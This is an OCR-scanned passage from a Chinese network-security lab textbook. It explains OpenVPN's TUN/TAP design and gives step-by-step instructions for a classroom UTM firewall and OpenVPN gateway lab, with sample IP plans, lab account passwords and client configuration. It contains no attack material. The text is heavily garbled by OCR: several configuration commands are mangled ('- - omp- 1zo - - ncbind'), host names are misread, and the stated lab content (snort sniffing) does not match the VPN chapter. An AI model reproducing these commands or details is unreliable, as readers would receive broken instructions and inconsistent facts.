OpenVPN 通过 使 用 工业 标准 SSL/TLS 协议 实现 了 OSI( 开 放 系 统 互 联 ) 第 2 层 及 第 3 
层 安 全 网 络 扩展 ,支持 灵活 的 证 书 、 智 能 卡 的 客户 端 认 证 方法 ,允许 通过 在 VPN 虚拟 接口 
上 应 用 防火 墙 规则 ,实现 用 户 及 组 访问 控制 策略 。OpenVPN 并 非 一 个 Web 应 用 代理 ,也 
不 能 通过 Web 浏览 器 进行 操作 。 

OpenVPN 的 技术 核心 是 虚拟 网 卡 , 其 次 是 SSL 协议 实现 ,由 于 SSL 协议 在 15. 3.2 小 
节 中 介绍 得 比较 清楚 了 ,这 里 重点 对 虚拟 网 卡 及 其 在 OpenVPN 的 中 的 工作 机 理 进行 介绍 。 

虚拟 网 卡 是 使 用 网 络 底 层 编程 技术 实现 的 一 个 驱动 软件 ,安装 后 在 主机 上 多 出 现 一 个 
网 卡 ,可 以 像 其 他 网 卡 一 样 进行 配置 。 服 务 程序 可 以 在 应 用 层 打开 虚拟 网 卡 , 如 果 应 用 软件 
(如 IE) 向 虚拟 网 卡 发 送 数据 , 则 服务 程序 可 以 读 取 到 该 数据 ,如 果 服 务 程 序 写 合适 的 数据 
到 虚拟 网 卡 ,应 用 软件 也 可 以 接收 得 到 。 虚 拟 网 卡 在 很 多 的 操作 系统 下 都 有 相应 的 实现 ,这 
也 是 OpenVPN 能 够 跨 平台 一 个 很 重要 的 理由 。 

在 OpenVPN 中 ,如 果 用 户 访问 一 个 远程 的 虚拟 地 址 (属于 虚拟 网 卡 配 用 的 地 址 系列 ， 
区 别 于 真实 地 址 ) , 则 操作 系统 会 通过 路 由 机 制 将 数据 包 (TUN 模式 ) 或 数据 帧 (TAP 模式 ) 
发 送 到 虚拟 网 卡 上 ,服务 程序 接收 该 数据 并 进行 相应 的 处 理 后 ,通过 socket 从 外 网 上 发 送 
出 去 ,远程 服务 程序 通过 socket 从 外 网 上 接收 数据 ,并 进行 相应 的 处 理 后 发 送 给 虚拟 网 卡 ， 
则 应 用 软件 可 以 接收 到 ,完成 了 一 个 单 向 传输 的 过 程 ,反之 亦 然 。 

OpenVPN 所 有 的 通信 都 基于 一 个 单一 的 IP 端口 ,默认 且 推 荐 使 用 UDP 协议 通信 , 同 
时 TCP 也 被 支持 。OpenVPN 连接 能 通过 大 多 数 的 代理 服务 器 ,并 且 能 够 在 NAT 的 环境 
中 很 好 地 工作 。 服 务 端 具 有 向 客户 端 * 推 送 ” 某 些 网 络 配 置信 息 的 功能 ,这 些 信息 包括 IP 地 
址 、 路 由 设置 等 。OpenVPN 提供 了 两 种 虚拟 网 络 接口 : 通用 Tun/Tap 驱动 ,通过 它们 可 以 
建立 3 层 IP 隧道 ,或 者 虚拟 二 层 以 太 网 ,后 者 可 以 传送 任何 类 型 的 二 层 以 太 网 络 数据 。 传 
送 的 数据 可 通过 LZO 算法 压缩 。IANA (Internet Assigned Numbers Authority) 指 定 给 
OpenVPN 的 官方 端口 为 1194。OpenVPN 2.0 以 后 版 本 每 个 进程 可 以 同时 管理 数 个 并 发 
的 隧道 。 

OpenVPN 使 用 通用 网 络 协议 (TCP 与 UDP) 的 特点 使 它 成 为 IPSec 等 协议 的 理想 蔡 
代 , 尤 其 是 在 ISPCInternet Service Provider) 过 滤 某 些 特 定 VPN 协议 的 情况 下 。 

在 选择 协议 时 候 , 需 要 注意 两 个 加 密 隧道 之 间 的 网 络 状 况 ,如 有 高 延迟 或 者 丢 包 较 多 的 
情况 下 ,请 选择 TCP 协议 作为 底层 协议 ,UDP 协议 由 于 存在 无 连接 和 重 传 机 制 , 导 致 隧道 
上 层 的 协议 进行 重 传 ,效率 非常 低下 。 


15.4 实验 内 容 

使 用 snort 进行 数据 包 的 嗅 探 . 记 录 和 分 析 ,并 熟悉 snort 的 一 些 简单 的 报警 规则 。 
15.5 实验 步骤 

本 练习 主机 A—F 为 一 组 。 实 验 角色 说 明 如 表 15-1 所 示 。 
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表 15-1 实验 角色 说 明 


实验 主机 实验 角色 系统 环境 

主机 A 内 网 主机 由 该 主机 完成 对 VPN 网 关 配 置 Windows 
主机 B 内 网 Web, FTP 服务 器 Linux 

主机 C DMZ 区 用 户 1 Windows 
主机 D DMZ 区 用 户 2 Linux 

主机 下 Internet 移动 用 户 1 Windows 
主机 下 Internet 移动 用 户 2 Linux 

统一 威胁 管理 UTM 企业 防火 墙 十 VPN 网 关 


15.5.1 搭建 企业 网 络 环境 


2004 年 9 月 ,IDC 首 度 提 出 “统一 威胁 管理 ”的 概念 ,即将 防 病毒 .人 侵 检测 和 防火 墙 安 
全 设备 划 归 统一 威胁 管理 (Unified Threat Management, UTM) 新 类 别 。IDC 将 防 病毒 、 防 
火 墙 和 入 侵 检测 等 概念 融合 到 被 称 为 统一 威胁 管理 的 新 类 别 中 ,该 概念 引起 了 业界 的 广泛 
重视 ,并 推动 了 以 整合 式 安全 设备 为 代表 的 市 场 细 分 的 诞生 。 由 IDC 提出 的 UTM 是 指 由 
硬件 .软件 和 网 络 技术 组 成 的 具有 专门 用 途 的 设备 , 它 主 要 提供 一 项 或 多 项 安全 功能 ,将 多 
种 安全 特性 集成 于 一 个 硬 设备 里 ,构成 一 个 标准 的 统一 管理 平台 。 从 这 个 定义 上 来 看 ,IDC 
既 提 出 了 UTM 产品 的 具体 形态 ,又 涵盖 了 更 加 深远 的 逻辑 范畴 。 从 定义 的 前 半 部 分 来 看 ， 
众多 安全 厂商 提出 的 多 功能 安全 网 关 、 综 合 安全 网 关 一 体 化 安全 设备 等 产品 都 可 被 划 归 到 
UTM 产品 的 范畴 ;而 从 后 半 部 分 来 看 ,UTM 的 概念 还 体现 出 在 信息 产业 经 过 多 年 发 展 之 
后 ,对 安全 体系 的 整体 认识 和 深刻 理解 。 目 前 ,UTM 常 定 义 为 由 硬件 .软件 和 网 络 技术 组 
成 的 具有 专门 用 途 的 设备 , 它 主要 提供 一 项 或 多 项 安全 功能 ,同时 将 多 种 安全 特性 集成 于 一 
个 硬件 设备 里 ,形成 标准 的 统一 威胁 管理 平台 。UTM 设备 应 该 具备 的 基本 功能 包括 网 络 
防火 墙 \ 网 络 人 侵 检测 /防御 和 网 关 防 病毒 功能 。 

DMZ 是 英文 demilitarized zone 的 缩写 ,中 文 名 称 为 “隔离 区 ”, 也 称 “ 非 军事 化 区 ”。 它 
是 为 了 解决 安装 防火 墙 后 外 部 网 络 的 访问 用 户 不 能 访问 内 部 网 络 服务 器 的 问题 ,而 设立 的 
一 个 非 安 全 系统 与 安全 系统 之 间 的 缓冲 区 。 该 缓冲 区 位 于 企业 内 部 网 络 和 外 部 网 络 之 间 的 
小 网 络 区 域内 。 在 这 个 小 网 络 区 域内 可 以 放置 一 些 必须 公开 的 服务 器 设施 ,如 企业 Web 服 
Fait FTP 服务 器 和 论坛 等 。 另 外 ,通过 这 样 一 个 DMZ 区 域 ,更 加 有 效 地 保护 了 内 部 网 络 。 
因为 这 种 网 络 部 署 , 比 起 一 般 的 防火 墙 方案 ,对 来 自 外 网 的 攻击 者 又 多 了 一 道 关卡 。 

如 图 15. 1 所 描述 ,首先 由 安全 设备 (统一 威胁 管理 UTM、NAT、OpenVPN 网 关 ) 和 6 
台 主 机 搭建 企业 网 络 环境 ,实验 的 最 终 目 标 就 是 架设 VPNs 使 主机 C, D,E, F 能够 通过 
OpenVPN 网 关 访 问 到 内 网 主机 A, EHL B, 并 能 够 进行 正常 通信 。 

统一 威胁 管理 UTM 的 内 部 IP 地 址 (Cetho 的 IP 地 址 ) 按 照 其 组 别 依次 为 172. 16. 0. 201, 
172.16.0.202,--,172.16.0. 206、…。 此 IP 地 址 为 统一 威胁 管理 UTM 默认 设置 ,实验 过 
程 中 不 能 更 改 。 

在 进行 实验 之 前 ,各 主机 均 按 图 15. 1 所 示 配 置 主机 IPC Windows 系统 配置 本 地 连接 ， 
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统一 威胁 管理 UTM . NAT 
OpenVPN 网 关 


企业 内 部 i Internet 
网 络 | DMZ 区 用 户 移动 用 户 
交换 模块 | 交换 模块 
I 
I 
I 


Ad Bo Cu D E v F i 
SS 2 6 
fm.604 LAn. 16.0.12 192.168.1.1//192.168.1.2 //202.98.1.1//202.98.1.2 


内 网 主机 内 网 服务 器 '[VPN 客 户 VPN 客 户 | |VYPN 客 户 | | VPN 客 户 


图 15.1 企业 网 络 拓扑 图 


Linux 系统 配置 eth0)。 

$.: 第 二 小 组 主机 A、B 使 用 网 络 地 址 172. 16. 0. 21 和 172. 16. 0. 22, 子 网 掩 码 
255. 255. 255. 0, 网 关 172. 16. 0. 202; 主机 CD 使 用 网 络 地 址 192. 168. 2. 1 和 192. 168. 2. 2 , 子 
1] 46.8535 255. 255. 255. 0, 网 关 为 192. 168, 2. 150; 主机 E,F 使 用 网 络 地 址 202. 98. 2. 1 和 
202. 98. 2. 2, F M 44 255. 255. 255.0, 网 关 为 202.98.2.150。 其 他 实验 小 组 以 此 类 推 。 

1. 恢复 统一 威胁 管理 UTM 至 默认 配置 

主机 A 打开 TE 浏览 器 ,在 地 址 栏 中 输入 “https:// 统 一 威胁 管理 UTM 的 内 部 IP: 
10443”, 在 稍 后 弹出 的 “安全 警报 ”对 话 框 中 单 击 “ 是 ”按钮 继续 操作 。 在 接 下 来 弹出 的 用 户 
登录 对 话 框 中 输入 用 户 名 和 密码 ,登入 后 统一 威胁 管理 UTM 的 Web 管理 页 面 如 图 15. 2 
所 示 。 


Dashboard efw-1280917277.localdomain 


Network configuration 


Appliance Community 
Event notifications 


Firewall 


Passende 2.6.27.19-72.625 
SSH access 19m 

GU settings Date updated at — 204735 
Backup 


B 15.2 UTM 管理 页 面 


在 左 侧 的 项 目 列表 中 选择 “备份 "项 ,进入 “备份 ”页面 。 

单 击 “ 出 厂 设 置 " 按 钮 即 可 将 系统 恢复 至 默认 状态 , 待 统一 威胁 管理 UTM 重新 启动 后 
即 可 进行 实验 操作 。 在 统一 威胁 管理 UTM 重启 过 程 中 主机 A 可 通过 在 控制 台中 输入 命 
令 “ping 统一 威胁 管理 UTM 的 IP -t” ,判断 统一 威胁 管理 UTM 是 否 已 经 启动 完毕 。 

2. 系统 网 络 设 置 

(1) 进入 统一 威胁 管理 UTM 的 Web 管理 页 面 ,选择 Network configuration( 网 络 设 
置 ) ,进入 “选择 RED 接口 类 型 "对话 框 ,选择 “以 太 网 STATIC”, 单 击 “ 下 一 步 ” 按 钮 。 

(2) 进入 “选择 网 络 范 围 ” 对 话 框 ,该 对 话 框 提 供 的 功能 是 通知 统一 威胁 管理 UTM dk 
组 建 的 网 络 中 存在 DMZ 区 域 ,选择 “橙色 ”( 网 络 中 存在 DMZ 区 ) , 单 击 “下 一 步 ?按钮 。 
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(3) 进入 Network preferences( 网 络 参数 ) 对 话 框 ,该 对 话 框 提供 的 功能 是 为 信任 网 络 
接口 eth0 与 DMZ 网 络 接口 ethl( 在 网 卡 接口 列表 中 选择 端口 2) ,设置 IP 地 址 及 重 定义 主 
机 名 及 域名 。 绿 色 网 络 接口 默认 设置 ,为 橙色 网 络 接口 填写 IP 地 址 192. 168. 1. 150( 第 二 
小 组 橙色 区 IP 地 址 为 192. 168. 2. 150, 其 他 小 组 以 此 类 推 ) 及 子 网 掩 码 255. 255. 255. 0 ,其 


他 保持 不 变 , 单 击 “ 下 一 步 ? 按 钮 。 


(4) 进入 Internet access preferences (互联 网 访问 参数 ) 对 话 框 ,在 该 对 话 框 为 红色 网 
络 接口 eth2( 在 网 卡 接口 列表 中 选择 端口 3) 设 置 IP 地 址 202. 98. 1. 150 CB — /NZRLRE AK 
IP 地 址 为 202. 98. 2. 150, 其 他 小 组 以 此 类 推 ), 子 网 掩 码 255. 255. 255. 0. 默认 网 关 为 
202. 98. 1. 150 , 单 击 “下 一 步 ? 按 钮 。 

(5) 进入 “配置 DNS” 对 话 框 ,该 对 话 框 提供 的 功能 是 为 统一 威胁 管理 UTM 指定 DNS 


服务 器 ,此 处 添加 两 个 DNS 服务 器 IP 地 址 ,可 任意 填写 , 单 击 “ 下 一 步 ” 按 钮 。 


(6) 进入 “启用 配置 "对话 框 ,该 对 话 框 提供 的 功能 是 使 前 面 的 设置 生效 。 单 击 *OK, 启 


用 配置 ”按钮 。 


(7) 实验 主机 网 络 参数 配置 。 按 表 15-2 所 示 的 信息 对 实验 主机 进行 配置 。 


表 15-2 主机 网 络 参数 


主机 网 络 地 址 BU Hx 
A 172. 16.0.11 Ragen ME 
B 172. 16. 0.12 gee a 
C 192. 168. 1.1 区 
D 192. 168.1.2 Dm 
E 202. 98. 1.1 — o 
F 202. 98. 1.2 Pili — 


3. 添加 防火 墙 访问 控制 策略 


CD 进入 统一 威胁 管理 UTM 的 Web 管理 对 话 框 , 单 击 * 防 火 墙 ? 选 项 卡 ,进入 防火 墙 
规则 配置 对 话 框 ,如 
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图 15. 3 所 示 。 


标签 V BA SARASAH O 


图 15.3 防火 墙 的 配置 
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(2) 添加 外 出 访问 规则 。 在 Outgoing traffic( 外 出 访问 ) 对 话 框 中 , 单 击 “添加 一 个 新 的 
防火 墙 规 则 ?链接 ,添加 新 规则 : 允许 内 网 主机 与 外 网 主机 进行 SMBCTCP 445 端口 ) 通 信 。 

规则 配置 内 容 如 下 : 

© Ñ. 

输入 : Zone/Interface 

Select interfaces: 绿色 

© 目标 。 

输入 : 二 红色 二 

@ 服务 /端口 。 

服务 : SMB over TCP 

协议 : TCP 

目的 地 端口 : 445 

© 策略 。 

行动 : 允许 

单 击 “ 创 建 规则 ”按钮 ,在 随后 弹出 的 信息 提示 框 中 单 击 “ 应 用 ”按钮 ,激活 此 规则 。 


15.5.2 架设 OpenVPN 网 关 


1. OpenVPN 服务 器 配置 
(1) 进入 统一 威胁 管理 UTM 的 Web 对 话 框 , 单 击 VPN 选项 卡 ,默认 进入 Server 
configuration(OpenVPN 服务 器 配置 ) 对 话 框 ,如 图 15.4 Pras, 


OpenVPN 服务 器 EM Server configuration | Accounts ”高 级 的 
OpenVPN 客户 (Gw2Gw) E) 
sec » 2588 


开启 OpenVPN 服 务 器 


动态 P 池 开始 地 址 
动态 P 池 结束 地 址 


Ese] 


图 15.4 OpenVPN 服务 器 配置 


配置 内 容 如 下 : 

CD 动态 IP 池 开始 地 址 。 

172.16. 0. 13( 第 二 小 组 设置 开始 地 址 为 172. 16. 0. 23 。 其 他 小 组 以 此 类 推 ) 。 

© 动态 IP 池 结 束 地 址 。 

172. 16. 0. 20( 第 二 小 组 设置 开始 地 址 为 172. 16. 0. 30。 其 他 小 组 以 此 类 推 ) 。 

开启 OpenVPN 服务 器 。 

(2) 切换 进入 Accounts 对 话 框 ,创建 VPN 用 户 账户 ,如 图 15.5 所 示 。 

单 击 Add account 按钮 ,进入 添加 新 用 户 对 话 框 。 

除 用 户 名 及 密码 外 ,其 他 项 目 不 用 填写 。 在 实验 中 为 主机 B.C、D、E、F 创建 账户 ,用 户 


名 及 密码 依次 为 userb/userbpass、 userc/usercpass, userd/userdpass, usere/userepass, 


userf/userfpass. 


125 


网 络 安全 与 管理 实验 教程 


126 


OpenvPH 服务 器 zi | > Ete Accounts 


OpenVPN EP(Gw2Gw) | 
IPsec » Account configuration, 


SE: Z BAC SRA) 


图 15.5 创建 VPN 用 户 账户 


记 住 这 些 授权 的 用 户 名 及 密码 ,在 以 后 步 又 中 需要 用 到 。 
(3) 高 级 配置 ,切换 进入 “高 级 的 ?选项 卡 ,进行 高 级 配置 ,如 图 15. 6 所 示 。 


OpenVPN 服务 器 Server configuration Accounts | 高 级 的 
Open VPN 客户 (Gw2Gw) BEDS UE 
Prec » Advanced settings 

mo: [1194 

协议 UOP 加 


Note: You may allow multiple ports by port forwarding them 


图 15.6 高 级 配置 


勾 选 阻止 来 自 隧 道 的 DHCP 应 答 ,其 他 选项 保持 不 变 , 单 击 “ 保 存 并 重启 ”按钮 ,保存 并 
重启 VPN 服务 。 

2. 证 书 下 载 与 颁发 

(1) 下 载 CA 证 书 。 

等 待 VPN 服务 重启 完毕 ,重新 进入 OpenVPN 服务 器 配置 对 话 框 。 此 时 会 显示 “下 载 
CA 证书” 按钮 , 单 击 该 按钮 从 OpenVPN 服务 器 上 下 载 CA 证 书 至 本 地 。 对 于 每 个 
OpenVPN 客户 来 说 ,该 证 书 都 是 必需 的 ,通过 该 证 书 OpenVPN 服务 器 可 以 确定 
OpenVPN 客户 的 合法 性 。 

(2) 为 VPN 用 户 分 发 认证 证 书 。 

主机 A 分 发 OpenVPN 根 证 书 UTM. cer 给 所 有 的 Openvpn 客户 (主机 C.D\E fI F). 
分 发 方法 如 下 。 

(D 分 发 给 主机 C AE. 

主机 A 依次 执行 “开始 ”一 “运行 "命令 ,在 弹出 的 对 话 框 中 输入 “\\ 主 机 C 的 IP”( 若 弹 
出 用 户 登 录 框 ,请 输入 用 户 名 student, 密 码 123456) ,将 根 证 书 文件 UTM. cer 复制 至 主机 
C 的 Work 共享 目录 中 ,用 同样 方法 将 UTM. cer 发 送 给 主机 EE。 

© 分 发 给 主机 D AF. 

主机 A 打开 TE 浏览 器 .在 地 址 栏 中 输入 ftp:// 主 机 D 的 了 P 了 ,在 登录 窗 体 中 右 击 , 在 弹 
出 的 快捷 菜单 中 选择 “登录 ”命令 ,登录 用 户 为 guest, 密 码 为 guestpass。 成 功 登 录 后 将 根 证 
书 文件 UTM. cer 上 传 至 FTP 目录 中 (上 传 目 录 对 应 目标 主机 D 的 /home/guest 目录 ) ,用 
同样 方法 将 UTM. cer 上 传 至 主机 下 的 /home/guest 目录 。 
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15.5.3 打开 内 网 Web/ FTP 服务 


CD 启动 服务 。 

在 主机 B 的 终端 控制 台中 输入 命令 service httpd restart 重新 启动 本 机 Web 服务 ; 输 
人 命令 service vsftpd restart 重新 启动 本 机 FTP 服务 。 

(2) 测试 服务 。 

服务 启动 后 ,主机 B 在 本 机 上 测试 服务 运行 是 否 正常 ,具体 方法 如 下 : 单 击 控制 面板 中 
的 启动 按钮 Web 浏览 器 ;在 地 址 栏 中 输入 “http:// 本 机 IP”, 若 显示 标题 为 Fedora Core 
Test Page 的 页 面 , 则 Web 服务 工作 正常 ,在 地 址 栏 中 输入 “ftp:// 本 机 IP”, 若 显示 “ftp:// 
本 机 IP/ 的 索引 ”的 页 面 , 则 FTP 服务 工作 正常 。 


15.5.4 配置 OpenVPN 客户 端 建立 VPN 隧道 


在 配置 OpenVPN 客户 端 之 前 ,请 完成 下 面 问题 的 填写 。 

与 主机 C 处 同一 网 段 内 的 统一 威胁 管理 UTM 网 络 接口 IP 是 

与 主机 D 处 同一 网 段 内 的 统一 威胁 管理 UTM 网 络 接口 IP 是 

与 主机 下 处 同一 网 段 内 的 统一 威胁 管理 UTM 网 络 接口 了 P 是 

与 主机 下 处 同一 网 段 内 的 统一 威胁 管理 UTM 网络 接口 IP 是 ，。 

以 下 步骤 1 在 Windows 系统 环境 中 进行 ;步骤 2 在 Linux 系统 环境 中 进行 。 

1. 在 Windows 平台 上 配置 OpenVPN 客户 端 (由 主机 C ME 完成 ) 

(1) OpenVPN 客户 程序 安装 目录 说 明 。 

Windows FAY OpenVPN 客户 程序 使 用 的 是 openvpn-2. 0. 7-gui-1. 0. 3-install ,安装 路 
径 为 C:\OpenVPN。bin 目录 下 存放 的 是 OpenVPN 系列 执行 文件 ;config 目录 下 存放 的 
应 是 OpenVPN 客户 或 OpenVPN 服务 器 配置 文件 ;driver 目录 下 存放 的 是 tun/tap 虚拟 网 
络 适配器 驱动 程序 ; log 目录 下 存放 的 是 vpn 日 志 ; sample-config 目录 下 存放 的 是 
OpenVPN 客户 和 OpenVPN 服务 器 配置 文件 实例 ,可 以 对 这 些 配置 文件 进行 仔细 阅读 。 

(2) 启动 TAP 网 络 适 配器 。 

OpenVPN 客户 端 是 通过 TAP 虚拟 网 络 适 配器 与 OpenVPN 服务 器 的 tun/tap 之 间 建 
立 安全 隧道 的 ,可 通过 单 击 实验 平台 工具 栏 中 的 “启动 TAP” 按 钮 安装 TAP 虚拟 网 络 适 配 
fit. TE TAP 启动 完成 后 ,通过 “网 上 邻居 ”可 看 到 连接 名 称 为 “本 地 连接 2 的 网络 适配器 ， 
名 称 为 TAP-Win32 Adapter V8, 

(3) OpenVPN 客户 端 配 置 。 

打开 配置 文件 C:\OpenVPN\config\client. ovpn。 这 里 简要 说 明 一 下 配置 文件 中 各 项 
功能 ,其 中 remote 项 后 的 内 容 X 需要 自行 填写 。 

Client: 用 于 声明 我 是 一 个 OpenVPN 客户 而 非 服务 器 。 

dev: 此 项 为 tap 指定 虚拟 网 络 适 配器 ,接口 类 型 为 以 太 网 ,该 项 要 严格 与 服务 器 端 
一 致 。 
proto; 此 项 为 udp 表明 数据 封装 使 用 的 协议 为 udp, 要 严格 与 服务 器 端 一 致 。 
remote X 1194; 该 项 指定 了 OpenVPN 服务 器 的 IP 地 址 和 端口 1194,X 代表 与 本 机 处 
同一 网 段 内 的 统一 威胁 管理 UTM 网 络 接口 IP 地 址 ,根据 先前 的 问题 填写 确定 此 处 X 
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的 值 。 

resolv-retry infinite: 始终 重新 解析 OpenVPN 服务 器 的 IP 地 址 。 

nobind: 在 本 机 不 绑 定 任何 端口 监听 incoming 数据 ,客户 端 无 需 此 操作 。 

dev-node mytap: 声明 虚拟 适配器 网 络 连接 名 称 为 mytap ,该 名 称 要 与 "网 上 邻居 ”中 
TAP 适配器 的 网 络 连接 名 称 相同 。 

ca d:\\Work\\UTM. cer: 声明 根 证 书 ,该 文件 就 是 从 OpenVPN 服务 器 上 下 载 得 到 的 
那个 证 书 文件 , 它 与 OpenVPN 服务 器 的 根 证 书 是 同一 个 文件 (注意 证 书 路 径 中 应 该 是 两 个 
PHI). 

comp-lzo: 该 是 压缩 选项 ,与 服务 器 保持 一 致 。 

配置 完成 后 ,保存 退出 。 

(4) 通过 “网 上 邻居 ”将 网 络 连 接 “ 本 地 连接 2? 重 命名 为 mytap ,此 时 系统 会 提示 “mytap 
网 络 电缆 被 拔 出 ?信息 。 

(5) 在 进行 建立 VPN 连接 之 前 ,请 确认 d: NWork 目录 下 CA 证 书 (UTM. cer 文 件 ) 已 
存在 。 单 击 实验 平台 工具 栏 中 的 OpenvpnClient 按钮 ,此 时 在 系统 任务 栏 的 托盘 区 会 出 现 
MIA te. 右 击 该 图 标 , 在 弹出 的 快捷 菜单 中 选择 connect 命令 ,此 时 会 弹出 要 求 输入 
OpenVPN 服务 器 授权 账户 的 对 话 框 ,如 图 15.7 所 示 。 


Disconnect | Reconnect | Hide 


图 15.7 OpenVPN 客户 登录 对 话 框 


输入 在 步骤 (2) 中 已 被 授权 的 用 户 名 及 密码 : 主机 C 输入 用 户 名 userc、 密 码 
usercpass， 主 机 下 输入 用 户 名 usere、 密 码 userepass。 等 待 OpenVPN 服务 器 对 客户 验证 
完成 。 

当 系 统 任务 栏 托 盘 区 中 的 勋 图 标 变 为 嘲 图 标 时 ,表明 mytap 已 处 于 连接 状态 ,VPN 已 
经 成 功 建立 ,此 时 将 鼠标 放置 于 该 图 标 之 上 会 弹出 在 VPN 中 本 机 的 IP 地 址 等 信息 。 

(6) 移动 用 户 与 企业 内 网 主机 通信 。 

主机 C 与 主机 下 可 同时 访问 主机 A 与 B, 具 体 可 操作 如 下 : 主机 C/E 对 主机 A/B 进 
行 ping 操作 ,判断 连接 性 。 相 反 地 ,主机 A/B 也 可 以 对 主机 C/E 进行 bing 操作 。 

ik: 目标 IP AR OpenVPN 服务 器 分 配 的 IP, 而 不 是 真实 网 卡 IP. 

主机 C/E 启动 Web 浏览 器 ,在 地 址 栏 中 输入 “http:// 主 机 B 的 IP/openvpn. htm". 
弹出 标题 为 “OpenVPN Fedora Core Test Page” 的 网 页 ;在 地 址 栏 中 输入 “ftp:// 主 机 B 的 
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IP 地 址 ”远程 登录 FTP 服务 器 。 

主机 C/E Æ IP 地 址 栏 中 输入 “\\ 主 机 A 的 IP 地址”, 对 主机 A 共享 目录 进行 文件 读 
写 操作 。 

2. 在 Linux 平台 上 配置 OpenVPN 客户 端 ( 由 主机 D 和 下 完成 ) 

(1) OpenVPN 客户 端 创建 tun/tap 设备 。 

由 于 OpenVPN 服务 器 与 客户 端 程序 是 通过 虚拟 网 络 适 配器 tun/tap 建立 网 络 隧道 
的 ,所 以 OpenVPN 客户 端 首先 要 确定 系统 已 创建 了 tun/tap 设备 。 在 一 些 开 源 系 统 中 
tun/tap 设备 在 系统 安装 时 就 已 被 安装 并 启动 。 可 使 用 命令 modprobe tun 来 查看 tun/tap 
设备 是 否 已 被 安装 (无 返回 信息 表明 设备 已 被 安装 ) ; 若 提示 信息 "FATAL: Module tun not 
found.”, 表 明 设 备 未 被 安装 ,可 使 用 命令 mknod /dev/net/tun c 10 200 完成 安装 。 

iE: 创建 tun/tap 设备 。 其 中 ,mknod 命令 的 功能 是 创建 块 或 字符 设备 文件 ;/dev/net/ 
tun 为 要 创建 的 设备 文件 ;c 表明 要 创建 字符 设备 文件 ; 主 设备 号 是 10, 次 设备 号 是 200。 执 
行 命令 后 若 提 示 “/dev/net/tun LH CAL” HW tun/tap 设备 已 被 创建 。 

(2) 创建 VPN 隧道 ,建立 VPN. 

将 /home/guest 目录 中 的 UTM. cer 文件 复制 至 /opt /Tools/vpn 目录 中 ,命令 如 下 。 


p/home/guest/UIM.cer /opt /Tools/vpn 


进入 OpenVPN 工作 目录 ,通过 以 下 命令 启动 OpenVPN 客户 端 ,并 与 服务 器 建立 
连接 。 

openvpn - - client - - pull - - omp- 1zo - - ncbind - - dev tap -一 ca 

/cpt/ Tools/vpn/UIM.cer —- - auth- user- pass - - remote 统一 威胁 管理 UIM IP 

其 中 ,client 声明 我 是 一 个 客户 ,配置 从 服务 端 pull 过 来 ;pull 该 选项 必须 用 在 
open VPN 客户 端 中 ;压缩 选项 comp-lzo 指定 在 VPN 连接 中 启动 实时 压缩 ,必须 和 服务 端 
严格 一 致 ;选项 nobind 表明 在 本 机 不 绑 定 任何 端口 监听 incoming 数据 ,client 无 需 此 操作 ， 
除非 一 对 一 的 VPN 有 必要 ;选项 dev 指定 接口 类 型 为 tap( 以 太 网 接口 类 型 ) ,严格 和 服务 
端 一 致 ;选项 ca 后 跟着 根 CA 文件 的 文件 名 ,也 就 是 从 Open VPN 服务 器 下 载 得 到 的 CA 认 
证 安全 证 书 , 用 于 验证 服务 器 CA 证 书 的 合法 性 .和 服务 器 配置 里 的 CA 证 书 是 同一 
件 ; 选 项 auth-user-pass 指定 由 OpenVPN 服务 器 授权 用 户 ;选项 remoter 指定 与 OpenVPN 
服务 器 连接 。 统 一 威胁 管理 UTM 的 IP 就 是 与 本 机 处 于 同一 网 段 内 的 统一 威胁 管理 UTM 
网 络 接口 IP 地 址 ,根据 先前 的 问题 填写 确定 此 处 的 统一 威胁 管理 UTM 的 IP。 

若 上 述 命令 执行 顺利 , 接 下 来 会 出 现 要求 输 入 Open VPN 服务 器 授权 账户 的 提示 信息 ， 
如 图 15. 8 所 示 。 


[root@Host5F vpn]# . /openvpn --client --pull --comp-lzo --nobind --dev 
tap --ca /opt/ExpNIS/NetAD-Lab/Tool s/ vpn/UTM.cer --auth-user-pass 

--remote 202. 98. 1. 150 

Tue Dec 30 16:50:21 2008 OpenVPN 2.0.8 i686-pc-linux [SSL] [Lz0] [EPOL 

L] built on Oct 11 2006 

Enter Auth Username:userf 

Enter Auth Password: 


图 15.8 授权 输入 
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输入 在 步骤 (2) 中 已 被 授权 的 用 户 名 及 密码 : 主机 D 输入 用 户 名 userd, 密码 
userdpass, 主机 下 输入 用 户 名 userf 密码 userfpass。 等 待 OpenVPN 服务 器 对 客户 验证 完 
成 ,直到 出 现 图 15. 9 所 示 提 示 信 息 。 


Tue Dec 30 16:52:58 2008 TUN/TAP device tap0 opened 

Tue Dec 30 16:52:58 2008 /sbin/ifconfig tap0 172. 16.0. 102 netmask 
255. 255.0 mtu 1500 broadcast 172. 16. 0. 255 

Tue Dec 30 16:52:58 2008 Initialization Sequence Completed 


图 15.9 VPN 成 功 建立 


从 图 15. 9 中 可 以 看 到 ,在 本 次 实验 中 虚拟 网 络 适 配器 tap0 被 OpenVPN 服务 器 所 分 
配 的 IP 地 址 为 172. 16. 0. 101 , 子 网 掩 码 为 255. 255. 255. 0。 至 此 在 企业 内 网 与 Internet 移 
动用 户 间 已 成 功 地 建立 起 VPN. 

(3) 移动 用 户 与 企业 内 网 主机 通信 。 

主机 DD 与 主机 下 可 同时 访问 主机 A 与 B, 具 体 可 操作 如 下 : 主机 D/F 对 主机 A/B H 
行 ping 操作 ,判断 连接 性 。 相 反 地 ,主机 A/B 也 可 以 对 主机 D/F 进行 ping 操作 (目标 IP 
是 被 OpenVPN 服务 器 分 配 的 IP ,而 不 是 真实 网 卡 IP). 

主机 D/F 启动 Web 浏览 器 ,在 地 址 栏 中 输入 “http:// 主 机 B 的 IP/openvpn. htm”, & 
弹出 标题 为 OpenVPN Fedora Core Test Page 的 网 页 ;在 地 址 栏 中 输入 “ftp:// 主 机 B 的 
IP” 可 远程 登录 FTP 服务 器 。 


15.6 思考 问题 


1. VPN 的 分 类 标准 有 哪些 ? 

2. 构建 一 个 VPN 系统 需要 解决 哪些 关键 技术 ? 这 些 技术 各 有 什么 作用 ? 
3. VPN 是 如 何 保证 其 传输 数据 安全 的 ? 

4. 试 着 建立 自己 的 虚拟 专用 网 ,并 归纳 其 实际 应 用 时 的 优 、 缺 点 。 
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16.1 实验 目的 与 要 求 


。 理解 iptables 工作 机 理 。 

* 熟练 掌握 iptables 包 过 滤 命令 及 规则 。 

。 学 会 利用 iptables 对 网 络 事件 进行 审计 。 

。 学 习 配置 iptables 打开 指定 端口 。 

。 通过 实例 了 解 iptables 的 应 用 ,学 习 使 用 netcat 在 两 台 主 机 间 传 送 文件 。 


16.2 实验 环境 


